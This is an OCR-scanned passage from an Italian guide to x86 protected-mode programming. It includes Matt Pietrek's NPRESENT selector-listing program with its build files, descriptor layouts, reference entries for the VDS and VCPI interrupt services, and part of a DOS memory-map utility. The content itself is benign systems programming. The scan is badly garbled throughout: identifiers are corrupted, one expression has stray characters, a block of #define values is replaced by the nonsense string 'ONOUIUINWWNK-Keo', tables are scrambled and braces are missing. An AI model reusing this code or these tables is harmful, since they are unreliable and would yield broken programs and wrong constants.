lpDescriptor->limit_0_15); 
lpszBaseFilename = szFilename; 
} 
else // GetModuleFileName() succeeded (owner is an HMODULE) 
{ 
// search backwards from the end of the string to find 
the 
// final directory separator. If it's found, bump up 
// the pointer by one to point directly to the base 
filename 
lpszBaseFilename = _fstrrchr(szFilename, '\\'); 
if ( lpszBaseFilename ) 
lpszBaseFilename++; 
} 
// Format the string to go into the listbhox: 
// "Selector code/data OwningFilename" 
wsprintf(szBuffer, "%04X %s %s", (i * 8) + 7, 
(LPSTR)(l1pDescriptor->code data ? "CODE" 
"DATA" ) 5 
(LPSTR)(lpszBaseFilename)); 
// Add the string to the listbhox 
SendDlgItemMessage(hwndDlg, IDL SELECTORS, LB_ADDSTRING, 
0, (LPARAM)(LPSTR)szBuffer); 
// update our running code/data descriptor totals 
lpbescriptor->code_data ? cCode++ : cDbata++; 
} 
lpDescriptor++; // Advance to the next descriptor 
} 


// Now that we've gone through all the descriptors, spit out the 
// final totals into the text control 
wsprintf(szBuffer, "Code: %u Data: %u", cCode, cData); 
SendDlgItemMessage(hwndDlg, IDT_TOTALS, WM_SETTEXT, 

0, (LPARAM)(LPSTR)szBuffer); 


} 


BOOL CALLBACK _export NPresentDlgProc(HWND hWwndDlg, UINT msg, 
WPARAM wParam, LPARAM lParam) 


switch ( msg ) 
{ 
case WM_COMMAND: 
if ( wParam == IDB_EXIT ) 
EndDialog(hwndDlg, 0); 
return TRUE; 
case WM_INITDIALOG: 
ListNotPresentSelectors(hwndDlg); 
return TRUE; 
case WM_CLOSE: 
EndDialog(hwndDlg, 0); 


return FALSE; 


} 
return FALSE; 
} 


int PASCAL WinMain( HANDLE hInstance, HANDLE hPrevInstance, 
LPSTR lpszCmdLine, int nCmdShow ) 


DialogBox(hInstance, "NPresentblg", 0, (DLGPROC)NPresentDlgProc); 
return 0; 


Questo è 1 file .DEF 


NAME NPRESENT 

DESCRIPTION 'Program to generate not-present fault' 
EXETYPE WINDOWS 

CODE PRELOAD MOVEABLE DISCARDABLE 

DATA PRELOAD MOVEABLE MULTIPLE 

STACKSIZE 5120 

HEAPSIZE 5120 


Il file .RC 


#include <windows. h> 
#include "npresent.h" 


NPresentDlg DIALOG 100, 48, 148, 118 
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU 
CAPTION "NPRESENT - Matt Pietrek 1993" 
BEGIN 

LTEXT "Not-Present Ring 3 selectors", -1, 4, 4, 104, 9, WS_CHILD | 
WS_VISIBLE | WS_GROUP 

LISTBOX IDL_SELECTORS, 4, 14, 140, 80, LBS_NOTIFY | WS_CHILD | WS_VISIBLE 
| WS_BORDER | WS_VSCROLL 

PUSHBUTTON "Exit", IDB_EXIT, 121, 100, 24, 14, WS CHILD | WS_VISIBLE | 
WS_TABSTOP 

LTEXT "", IDT_TOTALS, 4, 103, 104, 8, WS_CHILD | WS VISIBLE | WS_GROUP 
END 


Ed infine il file .H e .MAK 


#define IDL_SELECTORS 101 
#define IDB_EXIT 102 
#define IDT_TOTALS 103 


PROJNAME = NPRESENT 


$(PROJNAME).exe: $(PROJNAME).0bj $(PROJNAME).res 
link /ON:N /A:16 $(PROJNAME).0bj, $(PROJNAME), , \ 
LIBW.LIB TOOLHELP.LIB SLIBCEW.LIB,$(PROJNAME) . def 
RC $(PROJNAME).res $(PROJNAME).exe 


$(PROJNAME).obj: $(PROJNAME).c $(PROJNAME).h 
CL /W3 /GAs /62 /c /Zi $(PROJNAME).c 


$(PROJNAME).res: $(PROJNAME).rc 
RC -R -FO $(PROJNAME).res $(PROJNAME).rc 


Analizzando il programma potreste capire la tecnica che comunque vi sarà più 
chiara guardando i formati delle seguenti strutture. 


Il seguente è un formato di base del descrittore dei segmenti. 


Segment Descriptor 


15 14 13 12 11 10 09 08 07 06 05 04 03 02 01 00 


[ Base address 31:24 ] [G] [D] [©] [AVL] [Sg. length 19:16] 
[P] [DPL] [DT] [ Type ] [ Base address 23:16 

[ Base address 15:00 ] 
[ Segment length 15:00 ] 


Guardate le tabella nelle pagine successive i descrittori usati. 

Il descrittore di base di un segmento ha lunghezza 4*16=64 bits. 

Al fine di comprendere in modo migliore questa struttura la si può vedere in 
formato assemblativo. 


; contains a segment descriptor 


struc segment _descriptor 


seg _lengtho_15 dw ? ; low word of the segment length 
base_addr0o_15  dw ? j low word of base address 
base_addr16_23 db ? ; low byte of high word of base addr. 
flags db ? 7 segment type and misc. flags 
access db ? ; highest nibble of segment length 

; and access flags 
base_addr24 _31 db ? ; highest byte of base address 


ends segment _descriptor 
Il descrittore degli interrupts è invece il seguente. 


5 14 13 12 11 10 09 08 07 06 05 04 03 02 01 00 
Offset 31:16 


1 
[ ] 
[P] [ DPL] [©] [1] [1] [1] [©] [0] [©] [©] [0] [0] [©] [©] [09] 
[ Selector 00:15 ] 
[ Offset 00:15 ] 
In formato assembler invece 


; contains an interrupt descriptor 


struc interrupt_descriptor 


offset0o_15 dw ? i low word of handler offset 
selectoro_15 dw ? ; segment selector 

zero_byte db (0) ; unused in this descriptor format 
flags db ? ; flag-byte 

offset16_31 dw ? ; high word of handler offset 


ends interrupt_descriptor 

Il significato dei vari indicatori è il seguente. 
G la granularit del segmento 
O 1 byte4 di granularit 
14 K di granularit 


Se questo bit è settato si deve moltiplicare per 4096 la lunghezza delo 
campo nel descrittore per avere la lunghezza reale. 


E’ 
G 
G 


D Dimensione di defualt dell’operando 
D = © Operando a 16 bits 
D = 1 Operando a 32 bits 
Le dimensioni di default degli operandi di certe istruzioni speciali quali 
REP xxx. 


AVL Disponibile per il sistema 


DPL 


DT 


TYPE 


Nel prossimo capitolo vedremo un tabella con tutti gli interrupts. 
Qui a seguito riporto gli interrupts e i servizi legati al modo protetto. 


Questo bit non è usato per i processori 286/386/486. 


Presenza 

P = © il segmento non è presente 

P = 1 il segmento è presente 

Con questo bit è possibile implementare un gestore di memoria virtuale. 

Se un applicazione vuole allocare pi memoria di quanta disponibile, 
salvate l’ultimo segmento usato su disco, quindi cancellate il bit in P. 
Il prossimo accesso a questo segmento creer un General Protection Fault. 
Si intercetta l’errore , si rilegge il segmento e si setta il suo bit P. 
Il processore testa P solo dopo aver generato il Geneal Protection Fault. 


Descriptor Privilege Level. 

O <= DPL <= 3 

Il DPL contiene quello definito come Descriptor Privilege Level. 

Questo ha un range da 0 (privilegio maggiore) a 3 (privilegio minore). 

Se il processore tenta di accedere ad un segmento con privilegio maggiore 


di quello da cui è stata generata la chiamata, genera un General 
Protection Fault. 

Descriptor Type. 

DT = © System escriptor (System segment o Gate) 

DT = 1 Application descriptor (Data o Code) 

Se questo bit è azzerato il descrittore descrive un segmento che 


disponibile per un software di sistema o per un descrittore di gate. 


Tipo di segmento. 
Questi 4 bits descrivono il tipo di segmento. 


Bit 3 2 1 0 Type Description 
Name T E W A 
0 0 0 0 Data read-only 
0 0 0 1 Data read-only, accessed 
(o) 0 1 0 Data read/write 
0 0 1 1 Data read/write, accessed 
0 1 0 0 Data read-only, expand down 
0 1 0 1 Data read-only, exp. down, acc. 
0 1 1 0 Data read-write, expansion down 
0 1 1 1 Data read-write, exp. down, acc. 
1 0 0 0 Code exec-only 
Name T Cc R A 
1 0 0 1 Code exec-only, accessed 
1 0 1 (0) Code exec-read 
1 0 1 1 Code exec-read, accessed 
1 1 0 0 Code exec-only, conforming 
1 1 0 1 Code exec-only, conf., acc. 
1 1 1 0 Code exec-read, conforming 
1 1 1 1 Code exec-read, conf., acc. 


Error codes: 


01h 
02h 
03h 
04h 
05h 
06h 
07h 


region not in contigous memory 
region crossed a physical alignment boundary 


unable to lock pages 

no buffer available 

region too large for buffer 
buffer currently in use 
invalid memory region 


08h region wasn't locked 


09h number of physical pages greater than table length 


oah invalid buffer ID 

Obh copy out of buffer range 

och invalid DMA channel number 
Odh disable count overflow 

0eh disable count underflow 

Ofh function not supported 

10h reserved flag bits set in DX 


(DMA Descriptor Structure - DDS). 
Format as following: 


Offset Bytes Meaning 
00h 4 size of region 
04h 4 region offset 
08h 2 region segment 
oOah 2 buffer ID 

Och 4 linear address 


Alcune fnzioni usano un formato esteso (EDDS): 


Offset Bytes Meaning 

00h 4 size of region 

04h 4 region offset 

08h 2 region segment 

Oah 2 reserved 

och 2 number available 

Oeh 2 number used 

10h 04 linear address (region 0) 
14h 4 size in bytes (region 0) 
18h 04 linear address (region 1) 
ich 4 size in bytes (region 1) 


If there are page tables contained, the following structure applies: 


Offset Bytes Meaning 

00h 4 size of region 

04h 4 region offset 

08h 2 region segment 

Oah 2 reserved 

Och 2 number available 
Oeh 2 number used 

10h 4 Page Table Entry 0 
14h 4 Page Table Entry 1 


Bits 1-12 of a Page Table Entry should be cleared. 


page is present and locked. 


Func: VDS Get Version (AX=8102h) 
Call: INT 4Bh 
Input: AX=8102h 
DX=0 
Return: CY=1 - error 
AL=error code 


Bit 0 has to be set if the 


CF=0 - ok 

AH=major version number 
AL=minor version number 
BX=product number 
CX=revision number 


DX=flags 
SI:DI=buffer size 
Notes: Flag bits in DX: 

Bit Meaning 
(0) PC/XT Bus System (1Mb addressable) 
1 physical buffer/remap region in ist Mb 
2 automatic remap enabled 
3 all memory physically contigous 


4-15 reserved 
SI:DI contains maximal size of DMA buffer. 


Func: VDS Lock DMA Region (AX=8103h) 
Call: INT 4Bh 


Input: AX=8108h 
DX=Flags 
ES:SI=DMA Descriptor 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: DX is used as flag register to control the operation. 


Bit Meaning 
(0) reserved (cleared) 
1 copy data to buffer (ignored if bit 2 set) 
2 don't allocate buffer if region not contigous or 

exceeds physical boundaries (bit 4,5) 

don't try to automatically remap 

region must not exceed 64kb 

region must not exceed 128kb 
-15 reserved (cleared) 
Region Size Field in DDS contains size of maximal contigous memory 
area. If Carry Flag is clear, area is locked and may not be swapped. 
Physical Address and Buffer ID are filled by the function. If Buffer ID 
is ©, no buffer has been allocated. 


DOU0SAW 


Func: VDS Unlock DMA Region (AX=8104h) 
Call: INT 4Bh 


Input: AX=8104h 
DX=flags 
ES:DI=DMA Descriptor 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: Flag bits in DX: 
Bit Meaning 
(0) reserved (cleared) 
1 Copy data from buffer 


2-15 reserved (cleared) 
Region Size, Physical Address and Buffer ID in DDS have to be filled. 


Func: VDS Scatter/Gather Lock Region (AX=8105h) 
Call: INT 4Bh 
Input: AX=8105h 
BX=page offset (not sure about it) 
DX=flags 
ES:DI=DMA Descriptor 


Return: CY=1 - error 


Notes: 


AL=error code 
CY=0 - ok 
Function is used to lock parts of memory. Useful if parts of memory 
are swapped out. 
Flag bits in DX: 
Bit Meaning 
0-5 reserved (cleared) 


6 return EDDS with page table entries 
7 only lock existing pages, fill not existing pages 
with © 


8-15 reserved (cleared) 
Region Size, Linear Segment, Linear Offset and Number Available have to 
be set. Region Size Field in EDDS will be filled with size of largest 
contigous memory block. Number Used will be filled with the number of 
used pages. If bit 6 in DX is set, lower 12 bits of BX should contain 
offset of first page (not sure about that). 


Func: VDS Scatter/Gather Unlock Region (AX=8106h) 
Call: INT 4Bh 
Input: AX=8106h 
DX=Flags 
ES:DI=DMA Descriptor 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: Flag bits in DX: 
Bit Meaning 
0-5 reserved (cleared) 
6 EDDS contains page table entries 
7 EDDS may contain not present pages 
8-15 reserved (cleared) 
ES:DI contains EDDS initialised by function 8105h. 
Func: VDS Request DMA Buffer (AX=8107h) 
Call: INT 4Bh 
Input: AX=8107h 
DX=Flags 
ES:DI=DMA Descriptor 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: Flag bits in DX: 
Bit Meaning 
(0) reserved (cleared) 
1 Copy data to buffer 
2-15 reserved (cleared) 
ES:DI contains pointer to DDS. Region Size has to be filled. If bit 1 
in DX is set, Region Offset and Region Segment have to be filled, too. 
Function returns Physical Address, Buffer ID and Region Size. 
Func: VDS Release DMA Buffer (AX=8108h) 
Call: INT 4Bh 
Input: AX=8108h 
DX=flags 
ES:DI=DMA Descriptor 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: Flag bits in DX: 


Bit Meaning 

(0) reserved (cleared) 

1 copy data from buffer 

2-15 reserved (cleared) 
Buffer ID in DDS has to filled. If bit 1 in DX is set, Region Size, 
Region Offset and Region Segment have to be initialised, too. 


Func: VDS Copy into DMA Buffer (AX=8109h) 
Call: INT 4Bh 
Input: AX=8109h 
DX=0 
ES:DI=DMA Descriptor 
BX:CX=offset 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: BX:CX contains offset into DMA Buffer. ES:DI contains pointer to 
DDS. 
Buffer ID, Region Offset, Region Segment and Region Size have to be 
initialised. 


Func: VDS Copy out of DMA Buffer (AX=810ah) 
Call: INT 4Bh 
Input: AX=810ah 
DX=0 
ES:DI=DMA Descriptor 
BX:CX=offset 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: BX:CX contains offset into DMA Buffer. ES:DI contains pointer to 
DDS. 
Buffer ID, Region Offset, Region Segment and Region Size have to be 
initialised. 


Func: VDS Disable DMA Translation (AX=810bh) 
Call: INT 4Bh 
Input: AX=810bh 
DX=0 
BX=DMA channel 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: Function stops DMA transfer on channel BX. 


Func: VDS Enable DMA Translation (AX=810ch) 
Call: INT 4Bh 
Input: AX=810ch 
DX=0 
BX=DMA channel 
Return: CY=1 - error 
AL=error code 
CY=0 - ok 
Notes: Function starts DMA transfer on channel BX. 


VIRTUAL CONTROL PROGRAM INTERFACE (VCPI) 


Il VCPI è il metodo sandard pe la gestione della memoria in modo protetto. 


La comunicazione tra l’interfaccia e l’applicazone è suddivisa in Server e 
Client. 

Il programma che gestisce l'interfaccia è visto come Server mentre 
l'applicazione come Client. 

Per chiamare il server ci sono due metodi: in modo reale ci si può servire 
dell’interrupt 67H mentre in modo protetto bisogna eseguire delle CALL FAR. 

Qui a seguito sono riportati i servizi dell’ int 67H. 


Func: VCPI Installation Check (INT 67h, AX=DE00h) 
Call: INT 67h 
Input: AX=DE00h 
Return: AH=0 - VCPI is available 
BH=major version number 
BL=minor version number 
AH!=0 - VCPI not available 
Notes: Some docs say that AH=84h on return if VCPI isn't available, but EMM 
is enabled. 


Func: VCPI Get Protected Mode Interface (INT 67h, AX=DE01h) 

Call: INT 67h 

Input: AX=DE01h 
DS:SI=pointer to descriptors 
ES:DI=pointer to client pages 

Return: AH=0 - ok 
DI=pointer into page directory 
EBX=offset of entry point 
AH!=0 - error 

Notes: To call the Server in Protected Mode, you have to use the returned 
address. The memory at DS:SI has to have enough space for three GDT 
Descriptors, the first descriptor will be filled with the VCPI 
code segment. Use a FAR CALL into this segment, offset EBX, to reach 
the Server dispatcher. The space has to be in the first page in the 
applications code segment. ES:DI has to contain a pointer to a list of 
pages used by the Client. In DI, a pointer to the first unused page is 
returned. 


Func: VCPI Get Maximum Physical Memory (INT 67h, AX=DE02h) 
Call: INT 67h 


Input: AX=DE02h 
Return: AH=0 - ok 
EDX=page address 
AH!= - error 
Notes: EDX contains the address of the highest 4kb page in memory. The 
lowest 


12 bits are set to zero. Some Clients are using this call to 
initialize their data structures. 


Func: VCPI Get Number of Free 4K Pages (INT 67h / CALL FAR, AX=DE03h) 

Call: INT 67h / CALL FAR 

Input: AX=DE03h 

Return: AH=0 - ok 
EDX=number of free pages 
AH!=0 - error 

Notes: The call returns the number of free pages that are available for all 
tasks. This function is available in Protected Mode, too. (CALL FAR...) 


Func: VCPI Allocate a 4K Page (INT 67h / CALL FAR, AX=DE04h) 
Call: INT 67h / CALL FAR 
Input: AX=DE04h 


Return: AH=0 - ok 

EDX=page address 

AH!=0 - error 
Notes: The function allocates a 4K page for the Client. The lowest 12 bits 
of 

EDX are set to 0. This function is available in Protected Mode, too. 


Func: VCPI Free a 4K Page (INT 67h / CALL FAR, AX=DEO5h) 
Call: INT 67h / CALL FAR 


Input: AX=DE05h 
EDX=page address 
Return: AH=0 - ok 
AH!=0 - error 
Notes: The page has to be allocated by function DEO4h. The lowest 12 bits 
of 


EDX are set to 0. This function is available in Protected Mode, too. 


Func: VCPI Get Physical Address of Page in First MB (INT 67h, AX=DE06h) 
Call: INT 67h 
Input: AX=DE06h 
CX=page number 
Return: AH=0 - ok 
EDX=page address 
AH!=0 
Notes: The function returns the address of a page in the first MB. The 
lowest 
12 bits of EDX are set to zero. The page number in CX is the address of 
the page SHL 12. (This is written in my VCPI docs, but quite illogical, 
because then there are only the 4 highest bits available for the page 
number) 


Func: VCPI Read CRO (INT 67, AX=DE07h) 
Call: INT 67h 
Input: AX=DE07h 
Return: AH=0 - ok 
EBX=CRO 
AH!=0 - error 
Notes: The function returns CRO in EBX because MOV xxx,CR®O isn't allowed in 
V86 Mode. However, EMM386 and QEMM simulate this instruction and you 
don't have to use an interrupt call. 


Func: VCPI Read Debug Register (INT 67h, AX=DE08h) 
Call: INT 67h 


Input: AX=DE08h 
ES:DI=pointer to buffer 
Return: AH=0 - ok 
AH!=0 - error 
Notes: ES:DI has to provide enough space for 8 entries, every entry has a 
size 
of 4 bytes. The function stores DRO, DR1, ..., DR7. DR4 and DRS are 
unused. 


Func: VCPI Set Debug Register (INT 67h, AX=DE09h) 
Call: INT 67h 


Input: AX=DE09h 
ES:DI=pointer to buffer 
Return: AH=0 - ok 


AH!=0 - error 


Notes: ES:DI has to point to a table with 8 entries, every entry has a size 
of 
4 bytes. The function loads DRO, DR1, ..., DR7. DR4 and DRS are unused. 


Func: VCPI Get 8259 Interrupt Vector Mappings (INT 67h, AX=DEGAh) 

Call: INT 67h 

Input: AX=DEOAh 

Return: AH=0 - ok 
BxX=1st PIC Vector Map 
CX=2nd PIC Vector Map 
AH!=0 - error 

Notes: The Server returns the mapping from the Master PIC in BX (start of 
first 8 hardware IRQs) and the mapping from the Slave PIC in CX (start 
of next 8 hardware IRQs). If there's no Slave PIC installed, CX is 
undefined. 


Func: VCPI Set 8259 Interrupt Mappings (INT 67h, AX=DEOBh) 
Call: INT 67h 
Input: AX=DEOBh 

BxX=1st PIC Vector Map 

CX=2nd PIC Vector Map 


Return: AH=0 - ok 
AH!=0 - error 
Notes: Master PIC is programmed with BX, Slave PIC is programmed with CX. 


Interrupts have to be disabled before calling this function. 


Func: VCPI Switch to Protected Mode (INT 67h, AX=DEOCh) 
Call: INT 67h 


Input: AX=DEOCh 
ESI=pointer to data structure 
Return: AH=0 - ok 
AH!=0 - error 
Notes: The data structure has to be setup by the Client in the first MB. 
ESI 


has to contain the linear address of it. Structure as follows: 
Offset Bytes Meaning 
00h 4 new value for CR3 
04h 4 linear address in first MB of value for 
GDT register (6 bytes) 
08h 4 linear address in first MB of value for 
IDT register (6 bytes) 


och 2 selector for LDT register 
Eh 2 selector for Task Register 
10h 4 EIP of Protected Mode entry point 
14h 2 CS of Protected Mode entry point 


The function loads GDTR, IDTR, LDTR and TR. SS:ESP has to point to a 
stack with at least 16 bytes available on entry. EAX, ESI, DS, ES, FS 
and GS are destroyed. 

The CPU continues execution in Protected Mode at address CS:EIP 
specified in the table. 

Interrupts are disabled on return. 


Func: Switch from Protected Mode to V86 Mode (CALL FAR, AX=DEOCh) 
Call: CALL FAR 


Input: AX=DEOCh 
DS=segment selector 
Return: ciao 
Notes: The stack has to be shifted in the first MB on entry. DS has to 


contain 


a selector for a segment that includes the address area returned by 
function DEOIN. 
The function switches to V86 mode. Interrupt have to be disabled. 
GDTR, IDTR, LDTR and TR are initialised by the Server. SS:ESP has to 
contain the following structure: 

Offset Meaning 

-28h GS 

-24h FS 

-20h DS 

-1Ch ES 

-18h SS 

-14h ESP 

-10h reserved 

-OCh CS 

-08h EIP 

00h return address 
EAX is destroyed. 


Ed ora ecco un bel programmino che usando l’interrupt 67h appena visto vi 
restitusce informazioni sulla memoria in tutte le salse. 


// File: MAP .C 
// Compiler: Borland C++ 3.1 (COMPACT model with byte alignment) 
// Notes: Memory map. 


// Include files -------.---.---.-.--.-.--.-.--—---—-—-—-—————————————————‘—‘—‘—‘—‘——-‘-------- 
#include <stdio.h> 

#include <stdlib.h> 

#include <dos.h> 

#include <mem. h> 

#include <string.h> 


// Constants --.--.--.--.--.--.--.---—--———-————————.——————.————————————0——————————-------- 


#define uchar unsigned char 
#define ushort unsigned int 
#define ulong unsigned long 
#define FALSE (0) 

#define TRUE 1 

#define MAX_ITEM 150 

#define MAX_VEC 100 


#define MAX_DRIVE 20 
#define MAX_HANDLE 255 


#define MT_NONE 
#define MT_SYSCODE 
#define MT_SYSDATA 
#define MT_PROGRAM 
#define MT_DEVICE 
#define MT_ENV 
#define MT_DATA 
#define MT_FREE 
#define MT_MAP 


ONOUIUINWWNK-Keo 


#define NORMAL 
#define UPPER 


po 


#define USAGE "MAP 2.0, memory map utility\n" \ 


"Usage: MAP [-option ...]\n" \ 
"Options:\n" \ 
-n list of programs in normal memory 
(default)\n" \ 
-u list of programs in normal and upper 
memory\n" \ 

Ù -f full list of memory blocks\n" \ 

x -d list of device drivers\n" \ 

s -X XMS report\n" \ 

x -e EMS report\n" \ 

i -h,? this text" 


// Structure of device driver header. 
typedef struct device header { 

struct device _ header *next; 

ushort attr; 

ushort strategy_rutin; 

ushort interrupt_rutin; 

uchar name[8]; 
} DEVICE_HEADER; 


// Structure of device driver information. 
typedef struct { 

struct device _ header *addr; 

uchar devname[9]; 

uchar progname[9]; 

ushort attr; 

uchar drive_num; 

uchar drives[MAX_ DRIVE]; 
} DINFO; 


// Structure of DOS DPB. 
typedef struct dpb { 
uchar drive_num; 
uchar unit_number; 
ushort bytes_in_sector; 
uchar lsec_num; 
uchar log base; 
ushort reserved_num; 
uchar FAT_num; 
ushort rootentry_num; 
ushort first_sector; 
ushort largest_cluster; 
ushort sectors_in_ FAT; 
ushort root_firstsector; 
DEVICE_HEADER *device_addr; 
uchar media_ desc; 
uchar block _flag; 
struct dpb *next_dpb; 
} DPB; 


// Internal structure of DOS DATA blocks. 
typedef struct { 

uchar type; 

ushort start; 

ushort size; 

uchar unused[3]; 

uchar name[8]; 
} SD_HEADER; 


// Stucture of MCB header. 


typedef struct { 
uchar type; 
ushort owner; 
ushort size; 
uchar unused[3]; 
uchar name[8]; 

} MCB; 


// Structure of programs, device drivers, memory blocks information. 
typedef struct { 

uchar type; 

ushort seg; 

ushort owner; 

ushort environment; 

uchar name[10]; 

ulong size; 

uchar vecnum; 

uchar vectors[MAX_VEC]; 
} MINFO; 


// Structure of allocated EMS handles. 
typedef struct { 

ushort handle; 

ushort pages; 
} EMS_HANDLE; 


// Structure of allocated XMS handles. 
typedef struct { 

ushort handle; 

ulong size; 

ushort locks; 
} XMS_HANDLE; 


// Local variables -------------.--.--.--—--————————————————————————————-.—-.--.----- 
static uchar copyright[]= 
"Sulyok P,ter (C) 1992, 1994."; 


static MCB *first_mcb=NULL; 

static MINFO mlist[MAX_ITEM]; 

static ushort mlistnum=0; 

static DEVICE_HEADER *first_dev=NULL; 
static DPB *first_dpb=NULL; 

static DINFO dlist[MAX_ITEM]; 

static ushort dlistnum=0; 

static uchar *typenames[]= 


{ 


, 
"system code ", 
"system data ", 
"program Mi, 
"device driver", 
"environment ", 
"data area Le 
"free Mi 


}i 


static uchar ems_installed=FALSE; 
static uchar ems_name[]="EMMXXXX0"; 
static ushort ems_frame=0; 

static uchar ems_vermajor=0; 

static uchar ems_verminor=0; 

static ulong ems size=0L; 

static ulong ems_free=0L; 


static ushort ems_totalhandle=0; 

static ushort ems_freehandle=0; 

static ushort ems_usehandle=0; 

static EMS_HANDLE ems_handles[MAX_HANDLE]; 


static uchar xms_installed=FALSE; 
static void far (*xms_drv)(void); 
static ulong xms_free=0L; 

static ulong xms_largest=0L; 
static uchar xms_vermajor=0; 
static uchar xms_verminor=0; 
static uchar xms_hma=0; 

static uchar xms_a20=0; 

static XMS_HANDLE xms_handles[MAX_HANDLE]; 
static ushort xms_usehandle=0; 
static ushort xms_freehandle=0; 


static uchar upper_installed=FALSE; 
static ulong upper_free=0L; 
static ulong upper_large=0L; 
static ushort upper_index=0; 


// Local functions --------------------————.——————————— 
static void check_ems(void); 

static void check_xms(void); 

static void check_upper(void); 
static void check_memory(void); 
static uchar get_upperlink(void); 
static int set_upperlink(uchar); 
static void search_vectors(MINFO *); 
static void search_sd(MCB *); 

static void register_mcb(MCB *); 
static int is_psp(MCB *); 

static ushort env_seg(MCB *); 

static void make_mcb_list(void); 
static void make_dev_list(void); 
static void normal_list(uchar type); 
static void full list(void); 

static void device _list(void); 
static void ems_list(void); 

static void xms_list(void); 


// -----..---— 
// Name: check_ems 

// Input: - 

// Output: - 

// Notes: Checks EMS memory and gets EMS parameters. 

// ------.---— 
static void check_ems(void) 

{ 


void far *int67; 


int67=(void *)getvect(0x67); 
if (int67 == NULL) 
return; 


asm push ds 

asm push si 

asm push di 

asm les di, int67 
asm mov di,10 

asm lea si, ems_name 
asm mov Ccx,8 


asm cld 

asm repe cmpsb 
asm pop di 

asm pop si 

asm pop ds 

asm Jz _found 
return; 


_found: 
ems_installed=TRUE; 


asm mov ah,41h 

asm int 67h 

asm or ah, ah 

asm jnz _error 

asm mov ems_frame, bx 


asm mov ah, 46h 

asm int 67h 

asm or ah, ah 

asm jnz _error 

asm mov bl, al 

asm and al, ofh 

asm and bl, 0f0h 

asm mov cl,4 

asm shr bl,cl 

asm mov ems_vermajor,bl 
asm mov ems_verminor, al 


asm mov ah, 42h 

asm int 67h 

asm or ah, ah 

asm jnz _error 

asm mov word ptr ems size, dx 
asm mov word ptr ems size[2],0 
asm mov word ptr ems_free,bx 
asm mov word ptr ems_free[2],0 
ems_size*=16384L; 
ems_free*=16384L; 


asm push di 
_ES=FP_SEG(&ems_handles); 
_DI=FP_0FF(&ems_handles); 
asm mov ah, 4Dh 

asm int 67h 

asm pop di 

asm or ah, ah 

asm jnz error 


asm mov ems_usehandle, bx 


if (ems_vermajor >= 4) { 
asm mov ax,5402h 
asm int 67h 


asm or ah, ah 

asm jnz _error 

asm mov ems_totalhandle, bx 
} else { 

ems_totalhandle=ems_usehandle; 

} 


ems_freehandle=ems_totalhandle - ems_usehandle; 
return; 


_€error: 
puts("EMS INTERNAL ERROR. "); 


exit(1); 
// -----..---— 
// Name check_xms 
// Input: - 
// Output: - 
// Notes Checks XMS memory and gets XMS parameters. 
// ------.---— 
static void check_xms(void) 
{ 
asm mov ax,4300h 
asm int 2fh 
asm cmp al, 80h 
asm je _found 
return; 
_found: 


xms_installed=TRUE; 


asm mov ax,4310h 

asm int 2fh 

asm mov word ptr xms_drv, bx 
asm mov word ptr xms_drv[2],es 
asm mov ah, 0 


(*xms_drv)(); 


asm mov xms_vermajor,ah 
asm mov xms_verminor, al 
asm mov xms_hma, dl 

asm mov ah, 8 


(*xms_drv)(); 


asm mov word ptr xms_free, ax 

asm mov word ptr xms_free[2],0 
asm mov word ptr xms_largest, dx 
asm mov word ptr xms_largest[2],0 


xms_free*=1024L; 
xms_largest*=1024L; 


asm mov ah, 7 
(*xms_drv)(); 
asm or bl,bl 
asm jnz _error 
asm mov xms_a20, al 
return; 
_error: 
puts("XMS INTERNAL ERROR."); 
exit(1); 
} 
// ------.-— 
// Name get_upperlink 
// Input - 
// Output uchar 0 separated upper and normal blocks 
// 1 linked upper and normal blocks 
// Notes Checks the connection of normal and upper memory blocks. 
// --.---.----— 


static uchar get_upperlink(void) 


{ 


asm mov ax,5802h 
asm int 21h 
return(_AL); 


// Name: set_upperlink 
// Input: uchar link 0 separate it 

1 link it 
// Output: int 1 successful 

0 there is no upper memory 

1 system memory is trashed 
// Notes: Set the connection between upper and normal memory 
// blocks. 


static int set_upperlink(uchar link) 
{ 

asm mov ax,5803h 

asm xor bh, bh 

asm mov bl, link 

asm int 21h 

asm jc _noumb 


return(1); 


_noumb: 

asm cmp ax,1 
asm jne _trash 
return(0); 


_trash: 
return(-1); 


// Name: check_upper 

// Input: - 

// Output: - 

// Notes: Checks upper memory. 


static void check_upper(void) 


{ 


uchar origlink; 


origlink=get_upperlink(); 
switch(set_upperlink(1)) { 
case 1: 
upper_installed=TRUE; 
break; 


case 0: 
upper_installed=FALSE; 
break; 


case -1: 
puts( "SYSTEM MEMORY TRASHED!"); 
exit(1); 
break; 


} 
set_upperlink(origlink); 


// Name: check_memory 


// Input: - 

// Output: - 

// Notes: Checks EMS, XMS, upper memory. 

// ------.---—— 


static void check_memory(void) 


check_ems(); 
check_xms(); 
check_upper(); 


} 
// ------..-- 
// Name: is_psp 
// Input: MCB *mcb address of the MSC structure 
// Output: int TRUE it is a program 
// FALSE it is a simple MCB block 
// Notes: Checks the PSP of given MCB block. 
// --.---.--— 
static int is_psp(MCB *mcb) 
{ 
asm les bx,mcb 
asm MOV ax,es 
asm inc ax 
asm MOV es,ax 
asm mov ax, TRUE 
asm cmp word ptr es:[bx], 20CDh 
asm je _ exit 
asm mov ax, FALSE 
_ exit: 
return(_AX); 
} 
// ------..--— 
// Name: env_seg 
// Input: MCB *mcb address of MCB block 
// Output: ushort segment of enviroment 
// Notes: Returns the segment of the given MCB block. 
// ------.---—— 0 - 
static ushort env_seg(MCB *mcb) 
{ 
MCB *env; 
asm les bx,mcb 
asm MOV ax,es 
asm inc ax 
asm Mov es,ax 
asm mov bx, ax 
asm mov ax,es:[2Ch] 
asm dec ax 
asm Mov es,ax 
asm inc ax 
asm cmp es:[1],bx 
asm je _ exit 
asm mov ax,0 
_ exit: 
return(_AX); 
} 
// --------— 0 - 


// Input: MINFO *m address of a memory block 


// Output: - 
// Notes: Searches interrupt vectors of the given memory block. 
// ------.---—— 
static void search_vectors(MINFO *m) 
{ 
ushort i; 


ulong begin, end, iv; 
uchar far *ivp; 


begin=(ulong)(m->seg + 1) << 4; 
